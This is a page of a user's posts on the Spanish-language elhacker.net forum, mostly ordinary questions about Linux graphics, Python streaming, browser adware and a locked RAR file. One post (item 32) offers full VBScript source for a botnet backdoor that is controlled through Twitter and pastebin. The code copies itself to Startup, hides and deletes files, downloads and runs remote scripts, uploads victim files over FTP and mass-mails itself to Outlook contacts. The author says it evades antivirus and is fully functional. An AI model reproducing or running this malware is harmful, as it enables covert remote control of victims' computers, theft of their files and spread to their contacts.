elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13
31  Seguridad Informática / Seguridad / Tengo un virus y no se donde (supongo que esta dentro de Firefox) en: 10 Enero 2013, 12:41 pm
HOLA!!!

Primero gracias por leer este post con un tan mal titulo.

Lo que me pasa es que cuando clickeo un enlace a una web externa me pasa esto:
h ttp://adf.ly/1139866 /h ttp://www.elandroidelibre.com/?attachment_id=84806

La primera sección es lo que me agrega el virus, siempre me pone un enlace a su adfly y luego me pone al otro lado el link que clickee.

Luego, algunas imagenes me las reemplaza por un iFrame que va a Imagenar (una web)

Tienen idea que es esto?

GRACIAS POR LEER!!!
32  Programación / Scripting / [DoOrders.vbs] BackDoor controlado por twitter + pastebin. en: 6 Diciembre 2012, 19:08 pm
HOLA!!!


Nota: Cambie el codigo por que el api de twitter cambio ahora solo tienen que twittear de la url de pastebin por ejemplo pastebin.com/hola1234 solo twitean /hola1234


Primero que nada les voy a explicar lo que es esto, es un sistema que recibe y ejecuta ordenes.

Las ordenes son las siguientes:
Código:
Para descargar un Archivo de texto (vbs o js ;D):
down[%]Link[%]Carpeta[%]NombreArchivo

Para ejecutar un archivo:
xcec[%]Carpeta[%]NombreArchivo

Para descargar y ejecutar un vbs o js:
dwne[%]Link[%]Carpeta[%]NombreArchivo

Para copiar un archivo:
copy[%]Carpeta1[%]NombreArchivo1[%]Carpeta2[%]NombreArchivo2

Para eliminar un archivo:
supr[%]Carpeta[%]NombreArchivo

Para ocultar un archivo:
hide[%]Carpeta[%]NombreArchivo

Para subir un archivo a un FTP:
ftpu[%]FTPServer[%]FTPPort[%]FTPUser[%]FTPPass[%]SPath[%]SFile[%]OrdNum

Para mostrar un cuadro de texto:
msgb[%]TextoAMostrar

Para hacer melt:
melt

Para cerrar:
clos

Para detener la orden actual:
nord

NOTA IMPORTANTE
En carpeta pueden poner la carpeta o cualquiera de estas palabras claves:
"MYPATH" esta es el path del script
"FULLPATHONFILENAME" esta tomara como path lo que coloquen en el nombre del archivo.
"STARTUP" esta es la carpeta de inicio (ejecucion automatica al iniciar windows)

Ustedes diran, por que solo descarga texto? Rta, FUD.
Y replicaran, pero como hago para que descargue y ejecute mi exe que es binario y no ascii? Rta, cifra a base64 y descifra con un script ;).
Continuando, este codigo lo use para armar una botnet en vbs, cual es la ventaja de esto? Rta, que si borran algun ejecutable malicioso no borran este archivo.

Se le pueden agregar mil funciones mas, pero recomiendo que si queres agregar usa el Descargar y Ejecutar VBS por si tu codigo es detectado.

Como se usa este sistema:

1ro: Crear una cuenta en twitter.
2do: Crear un pastebin con las ordenes a hacer.
3ro: Twittear SOLO la url de pastebin.
Nota: Cambie el codigo por que el api de twitter cambio ahora solo tienen que twittear de la url de pastebin por ejemplo pastebin.com/hola1234 solo twitean /hola1234
4to: Esperar y disfrutar XD.

El codigo, lo que esperaban:
Código
  1. on error resume next
  2. Dim Orders
  3. Dim MyFullPath: MyFullPath = WScript.ScriptFullName
  4. Dim MyPath: MyPath = Left(MyFullPath, InstrRev(MyFullPath, "\")-1)
  5. Dim MyName: MyName = WScript.ScriptName
  6. Dim user : user = "botiloveyou" 'Aca pone tu usuario de twitter
  7. 'FTP
  8.   Dim FTPData
  9.   Dim FTPCOMPLETE
  10.   Dim W1
  11.   Dim W2
  12. '/FTP
  13.  
  14. Main
  15. Sub Main()
  16.   If Not (CreateObject("scripting.filesystemobject").FileExists("C:\SS.ORD") and MyFullPath = ConvertPath("STARTUP",MyName)) Then
  17.       CreateObject("Scripting.FileSystemObject").CreateTextFile("C:\SS.ORD", True).WriteLine ("0")
  18.       CopyToStartUP MyPath , MyName
  19.       Hidefile "STARTUP", MyName
  20.       ExecuteFile "STARTUP", MyName
  21.       Melt
  22.       WScript.Quit (1)
  23.   End If
  24.   Do
  25.       DoOrders "[%]"
  26.       For x = 0 To 200
  27.           WScript.Sleep 10000
  28.       Next
  29.   Loop
  30. End Sub
  31. Sub DoOrders(OrdSeparator)
  32.   GetOrders
  33.   For x = 0 To UBound(Orders)
  34.       Ord = Split(Orders(x), OrdSeparator)
  35.       Select Case Ord(0)
  36.           Case "nord"
  37.               Exit For
  38.           Case "down" 'Download VBS
  39.               DownloadVBS Ord(1), Ord(2), Ord(3)
  40.           Case "xcec" 'Execute
  41.               ExecuteFile Ord(1), Ord(2)
  42.           Case "dwne" 'Download and Execute VBS
  43.               DownloadVBS Ord(1), Ord(2), Ord(3)
  44.               ExecuteFile Ord(2), Ord(3)
  45.           Case "copy" 'Copy
  46.               FileCopy Ord(1), Ord(2), Ord(3), Ord(4)
  47.           Case "supr" 'Delete
  48.               DeleteFile Ord(1), Ord(2)
  49.           Case "hide" 'Hide
  50.               HideFile Ord(1), Ord(2)
  51.           Case "melt" 'Melt
  52.               Melt
  53.           Case "ftpu" 'Upload to FTP
  54.               Set W1 = WScript.CreateObject("MSWINSOCK.Winsock", "W1_")
  55.               Set W2 = WScript.CreateObject("MSWINSOCK.Winsock", "W2_")
  56.               Call FTPUpload(Ord(1), Ord(2), Ord(3),Ord(4), Ord(5), Ord(6), Ord(7))
  57.               Set W1 = Nothing
  58.               Set W2 = Nothing
  59.           Case "msgb" 'MsgBox
  60.               Msgbox Ord(1)
  61.           Case "clos" 'Close
  62.        WScript.Quit (1)
  63.       End Select
  64.   Next
  65. End Sub
  66. Function LastOrderDone()
  67.   LastOrderDone = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\SS.ORD", 1).ReadAll
  68. End Function
  69. Sub ExecuteFile(SPath, SFile)
  70.   CreateObject("WScript.Shell").run """" & ConvertPath(SPath, SFile) & """"
  71. End Sub
  72. Sub FileCopy(Spath, SFile, Spath2, SFile2)
  73.   CreateObject("scripting.filesystemobject").CopyFile ConvertPath(Spath, SFile),ConvertPath(Spath2, SFile2),True
  74. End Sub
  75. Sub Melt()
  76.   DeleteFile "FULLPATHONFILENAME", MyFullPath
  77. End Sub
  78. Sub DeleteFile(SPath, SFile)
  79.   CreateObject("Scripting.FileSystemObject").DeleteFile ConvertPath(SPath, SFile)
  80. End Sub
  81. Sub DownloadVBS(Z, SPath, SFile)
  82.   Set xhttp = CreateObject("Microsoft.XmlHttp")
  83.   xhttp.open "GET", Z, False
  84.   xhttp.send ""
  85.   Z = xhttp.responseText
  86.   If CreateObject("scripting.filesystemobject").FileExists(ConvertPath(SPath, SFile)) Then CreateObject("Scripting.FileSystemObject").DeleteFile ConvertPath(SPath, SFile)
  87.   CreateObject("Scripting.FileSystemObject").CreateTextFile(ConvertPath(SPath, SFile), True).WriteLine (Z)
  88.   Set xhttp = Nothing
  89.   Do While Not CreateObject("scripting.filesystemobject").FileExists(ConvertPath(SPath, SFile))
  90.   WScript.Sleep 500
  91.   Loop
  92. End Sub
  93. Function ConvertPath(SPath, SFile)
  94.   If UCase(SPath) = "MYPATH" Then ConvertPath = CreateObject("Shell.Application").NameSpace(26).Self.Path: Exit Function
  95.   If UCase(SPath) = "FULLPATHONFILENAME" Then ConvertPath = SFile: Exit Function
  96.   If UCase(SPath) = "STARTUP" Then SPath = CreateObject("WScript.Shell").SpecialFolders("StartUp")
  97.   ConvertPath = SPath & "\" & SFile
  98. End Function
  99. Sub GetOrders()
  100.   Orders = Split("nord nord")
  101.   Dim Orden
  102.   Dim xhttp
  103.   Dim y
  104.   Dim URLPASTEBIN
  105.   Dim http : Set http = CreateObject("Microsoft.XmlHttp")
  106. http.open "GET", "http://api.twitter.com/1/statuses/user_timeline/" & user & ".xml", False
  107. http.send
  108. y = split(http.responsetext,"<text>")
  109. If ubound(y)>0 then
  110. msgbox y(1)
  111. URLPASTEBIN = "http://pastebin.com" & split(y(1),"</text>")(0) : set http = Nothing
  112. msgbox urlpastebin
  113. End if
  114.      Set xhttp = CreateObject("Microsoft.XmlHttp")
  115.      If CheckOrder(URLPASTEBIN) = 0 Then Exit Sub
  116.      xhttp.open "GET", URLPASTEBIN, False
  117.      xhttp.send ""
  118.      Z = LCase(xhttp.responseText)
  119.      Set xhttp = Nothing
  120.      Z = Replace(Split(Split(Z, "<textarea")(1), ">")(1), "</textarea", vbNullString)
  121.      Orders = Split(Z, vbNewLine)
  122. End Sub
  123. Sub HideFile(SPath, SFile)
  124.   CreateObject("scripting.filesystemobject").GetFile(ConvertPath(SPath, SFile)).Attributes = -2
  125. End Sub
  126. Sub CopyToStartUP(SPath, SFile)
  127.   CreateObject("scripting.filesystemobject").CopyFile ConvertPath(SPath, SFile), CreateObject("WScript.Shell").SpecialFolders("StartUp") & "\" & SFile, True
  128. End Sub
  129. Function FTPUpload(FTPServer, FTPPort, FTPUser, FTPPass, SPath, SFile, OrdNum)
  130.   W1.RemoteHost = FTPServer
  131.   W1.RemotePort = FTPPort
  132.   W1.Connect
  133.   If WaitResponse Then Exit Function
  134.   If FTPCODE <> 220 Then Exit Function
  135.       FTPData = ""
  136.       W1.SendData "USER " & FTPUser & vbCrLf
  137.       If WaitResponse Then Exit Function
  138.   If FTPCODE <> 331 Then Exit Function
  139.       FTPData = ""
  140.       W1.SendData "PASS " & FTPPass & vbCrLf
  141.       If WaitResponse Then Exit Function
  142.   If FTPCODE <> 230 Then Exit Function
  143.       FTPData = ""
  144.       W1.SendData "PASV" & vbCrLf
  145.       If WaitResponse Then Exit Function
  146.   If FTPCODE <> 227 Then Exit Function
  147.       Dim Aux
  148.       Aux = Split(FTPData, ",")
  149.       FTPDataPort = (Aux(UBound(Aux) - 1) * 256) + Left(Aux(UBound(Aux)), InStr(Aux(UBound(Aux)), ")") - 1)
  150.       FTPDataIP = Trim(Replace(Right(Aux(0), 3), "(", vbNullString)) & "." & Aux(1) & "." & Aux(2) & "." & Aux(3)
  151.       FTPData = ""
  152.       W1.SendData "STOR " & Int(Rnd() * 1000000) & Int(Rnd() * 1000000) & "." & OrdNum & vbCrLf
  153.       W2.RemotePort = FTPDataPort: W2.RemoteHost = FTPDataIP
  154.       W2.Connect
  155.       WaitResponse
  156.   If Not (FTPCODE = "125" Or FTPCODE = "150") Then Exit Function
  157.       FTPUpload = Upload(ConvertPath(SPath, SFile))
  158. End Function
  159. Function Upload(FilePath)
  160.   Dim UPFile
  161.   Dim FileLen
  162.   Dim TotalSent
  163.   Dim a
  164.   Set a = WScript.CreateObject("ADODB.Stream")
  165.   a.open
  166.   a.Type = 1
  167.   a.LoadFromFile (FilePath)
  168.   UPFile = a.Read()
  169.   FTPCOMPLETE = False
  170.   W2.SendData UPFile
  171.   EsperaSubida = 0
  172.   Do
  173.       WScript.Sleep 1000
  174.       EsperaSubida = EsperaSubida + 1
  175.       If SendIsComplete = 1 Then Upload = True: Exit Function
  176.       If EsperaSubida > 300 Then Exit Function
  177.   Loop
  178. End Function
  179. Sub W1_DataArrival(ByVal bytesTotal)
  180.   W1.GetData FTPData, 8
  181. End Sub
  182. Function SendIsComplete()
  183.   SendIsComplete = FTPCOMPLETE
  184. End Function
  185. Sub w2_SendComplete()
  186.   FTPCOMPLETE = 1
  187. End Sub
  188. Function WaitResponse()
  189.   Espera = 0
  190.   Do
  191.       WScript.Sleep 1000
  192.       Espera = Espera + 1
  193.       If Espera > 10 Then WaitResponse = 1: Exit Function
  194.       If FTPCODE <> 0 Then Exit Function
  195.   Loop
  196. End Function
  197. Function FTPCODE()
  198.   If Len(FTPData) > 3 Then FTPCODE = Left(FTPData, 3) Else FTPCODE = 0
  199. End Function
  200. Function uncif(Tweet)
  201.   Tweet = Replace(Tweet, Chr(32), vbNullString)
  202.   Movex = Left(Tweet, 1)
  203.   For x = 2 To Len(Tweet)
  204.       uncif = uncif & Chr(Asc(Mid(Tweet, x, 1)) + Movex)
  205.   Next
  206. End Function
  207. Function CheckOrder(expression)
  208. Dim EscOrd
  209.  if instr(expression, "/") then
  210.  Set EscOrd = CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\SS.ORD", 1)
  211.  Aux = EscOrd.ReadAll
  212.  Dim Aux2
  213.  Set EscOrd = Nothing
  214.  Aux2 = Split(Aux,VbNewLine)
  215.  For x = 0 to ubound(aux2)
  216.     If Replace(expression,"pastebin","google") = Aux2(x) then CheckOrder = 0: Exit Function
  217.  Next
  218.  set EscOrd = CreateObject("Scripting.FileSystemObject").CreateTextFile("c:\SS.ORD", True)
  219.  EscOrd.Write (Aux & VbNewLine & Replace(expression,"pastebin","google"))
  220.  EscOrd.Close
  221.  Set EscOrd = Nothing
  222.  CheckOrder = 1
  223.  end if
  224. End Function
  225. Sub SpreadOutLook(Message,Subject,SPath, SFile)
  226. Set Contacts = WScript.CreateObject("Outlook.Application").GetNamespace("MAPI").GetDefaultFolder(10)
  227. Cant = Contacts.Items.Count
  228. For X = 1 to Cant
  229.   If Contacts.Items.Item(x).Email1Address <> "" Then
  230.       Set Email = CreateObject("Outlook.Application").CreateItem(0)
  231.       Email.To = Contacts.Items.Item(x).Email1Address
  232.       Email.Subject = Replace(Subject,"%nombre%",Contacts.Items.Item(x).FullName)
  233.       Email.ReadReceiptRequested = False
  234.       Email.HTMLBody = Replace(Message,"%nombre%",Contacts.Items.Item(x).FullName)
  235.       Email.Attachments.Add ConvertPath(SPath, SFile)
  236.       Email.Send
  237.   End If
  238. next
  239. End Sub

Nota: Mi version obviamente no es esa, usa encriptacion y otro sistema de tweets pero esa que deje es funcional al 100%.

GRACIAS POR LEER!!!
33  Sistemas Operativos / Unix/Unix-Like / Knoppix-Debian No me levanta el entorno Grafico en: 12 Septiembre 2012, 17:35 pm
HOLA!!!

Nota, estoy trabajando sobre este equipo

Ayer yo re contento con el logro de la netbox se me ocurre reiniciarla...

Cuestion enciende todo bien pero con la pantalla negra, una ves iniciado el sistema no carga la parte grafica...

Lo que hice fue apretar CTRL ALT F1 para que me traiga una terminal y puse a hostear una VNC para ver si era problema de la conf del monitor o de que no iniciaba el escritorio para mi solo.

Lo que paso fue que el de forma "local" no la puedo usar, pero por medio de la VNC veo el escritorio (de la vnc) y tengo acceso a la pc.

Alguien tiene idea que puede haber pasado?

Lo que hice con la NetBox es lo siguiente (lo estoy anotando para "automatizarlo y no pensar tanto en un futuro XD):

Código:
     Sacar disco rigido de la NetBox.
     Ponerlo en otra PC con Compactera.
     Instalar knoppix 7 en la PC.
     Volver a colocar el disco en la NetBox.
     Abrir terminal y obtener acceso root "su".
     Instalar DropBox Google Translate http://shiremono.com/?p=2996 *opcional
     Convertir Knoppix a Debian Unstable http://www.devshed.com/c/a/BrainDump/Install-Linux-with-Knoppix/4/
     Instalar Ninja-Ide "apt-get install ninja-ide" *opcional
     Instalar Open-CV "apt-get install libcv-dev libcvaux-dev libhighgui-dev libcv2.* libhighgui2.* libcvaux2.* opencv-doc"
     Instalar ZoneMinder "apt-get install zoneminder"

Cuando inicio me quedan 2 errores impresos en la terminal no se si tendra que ver pero los transcribo:

Código:
    add_watch(6, /dev/cloop2, 10) failed: no such file or directory
    add_watch(6, /dev/zram0, 10) failed: no such file or directory


Despues de tenerla un tiempo prendida se me cayo la vnc fui a la PC y estaba mostrando un mensaje continuamente



Por si no pueden ver la foto Transcribo el contenido:
Código:
Please try to reboot and give some Knoppix-Cheatcodes
at the initial boot:-prompt, which match your graphic adapter.
Examples:

    knoppix xmodule=radeon (or ati, nv, cirrus ...)
    knoppix xmodule=fbdev
    knoppix xmodule=vesa
    knoppix hsync=90 vsync=75

GRACIAS POR LEER!!!
34  Programación / Scripting / [PYTHON] Streaming live webcam. en: 29 Agosto 2012, 18:54 pm
HOLA!!!

Estoy buscando algun metodo para compartir el video en vivo de una webcam en internet con python , si es posible que sea accesible mediante equipos celulares.

Solo pido informacion al respecto, algun link o algo.

Estoy bastante perdido, no encuentro nada en google.

GRACIAS POR LEER!!!
35  Foros Generales / Dudas Generales / Ayuda para recuperar password de archivo RAR en: 23 Agosto 2012, 16:14 pm
HOLA!!!

Mi problema es el siguiente, tengo un archivo(word) comprimido en un rar con contraseña (la cual puede ir de 1 a 16 caracteres alfanumericos y upper and lower case) intente "crackear" la password pero el proceso dice que tardara mas de 10 años.

El rar es formato 2.9  quisiera saber si alguno me puede extraer el archivo, no tengo ninguna pc potente que pueda hacer el trabajo duro, talves alguno se apiada :).

alguien puede?

http://www.mediafire.com/?xif6nfgeu87it2h

GRACIAS POR LEER!!!
36  Sistemas Operativos / GNU/Linux / Windows 98/Me/2000 Desktop Enviroment? en: 16 Agosto 2012, 19:24 pm
HOLA!!!

Quisiera saber si alguno conoce algun buen DE tipo w$ 98/me/2000 si es posible que siga el soporte y el desarrollo.

Se que preguntar esto en este foro es como entrar a la CIA vestido de Irani con 2 reenes y una bomba.

Pero eso es lo que busco si saben me dicen?

GRACIAS POR LEER!!!
37  Programación / Scripting / [PYTHON] Multihilo con webbrowser y py. en: 30 Julio 2012, 15:35 pm
HOLA!!!

Bueno resulta que estaba programando una aplicacion que se pueda manejar desde el escritorio como desde la web, el problema es que cuando ejecuto el webbrowser el script principal no se sigue ejecutando.

Las lineas que quiero que se ejecute es:
"        print "se inicio?"" de main.py

Y como una nota por si quieren probar como funciona tienen que colocarlo en este arbol de carpetas:

Carpeta Raiz:
 · main.py
 · webserver.py
 · Carpeta WEB:
 ·  · Index.html

Aqui las fuentes:
https://gist.github.com/3176646

GRACIAS POR LEER!!!
38  Informática / Software / Offline Post Creator por 79137913 en: 29 Junio 2012, 20:23 pm
HOLA!!!

Como sabran estoy desarrollando aplicaciones para el uso del foro, la ultima fue:
Notificador de mensajes nuevos del foro! por 79137913

Y ahora un programa inspirado en uno viejo que se perdio hecho por vanhan.

Screenshot!


Descarga:
http://www.mediafire.com/?j7i8tiskd5yk19o


P.D: Sugerencias y mejoras escucho.

GRACIAS POR LEER!!!
39  Foros Generales / Foro Libre / Como recibir notificaciones cuando hay nuevos temas en el foro! en: 25 Junio 2012, 18:54 pm
HOLA!!!

Aqui concluye mi "triple" post.

Arme un programa para que me avise cuando hay nuevos temas en el foro, creo que esto le puede ser util a muchos.

Link aqui:
http://foro.elhacker.net/software/notificador_de_temas_nuevos_del_foro_por_79137913-t365382.0.html

GRACIAS POR LEER!!!
40  Foros Generales / Sugerencias y dudas sobre el Foro / Programa que notifica sobre los nuevos temas del foro! en: 25 Junio 2012, 18:52 pm
HOLA!!!

Arme un programa para que me avise cuando hay nuevos temas en el foro, creo que esto le puede ser util a muchos.

Link aqui:
http://foro.elhacker.net/software/notificador_de_temas_nuevos_del_foro_por_79137913-t365382.0.html

GRACIAS POR LEER!!!
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines